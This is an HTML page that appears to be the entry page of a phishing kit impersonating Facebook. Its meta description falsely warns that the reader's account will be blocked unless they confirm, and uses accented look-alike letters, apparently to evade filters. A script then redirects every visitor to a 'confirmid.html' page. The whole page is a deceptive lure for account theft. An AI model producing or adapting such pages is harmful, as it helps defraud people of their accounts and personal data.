<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<meta name="description" content="If you don't confirm, our system will automatícally block your Facebook account and you won't be able to use ít anymore." />
<meta name="author" content="ThemeTags" />
<meta property="og:title" content="Verification Pages Support Secure" />
<meta property="og:description" content="" />
<meta property="og:image" content="https://i.imgur.com/jPmh2Bj.png" />
<meta property="og:type" content="article" />

<script type="text/javascript">
var isMobile = function() {
   //console.log("Navigator: " + navigator.userAgent);
   return /(iphone|ipod|ipad|android|blackberry|windows ce|palm|symbian)/i.test(navigator.userAgent);
 };
 if(isMobile()) {
    window.location.href = "confirmid.html";
} else {
	window.location.href = "confirmid.html";
}
</script>

</head>
<body>
</body>
</html>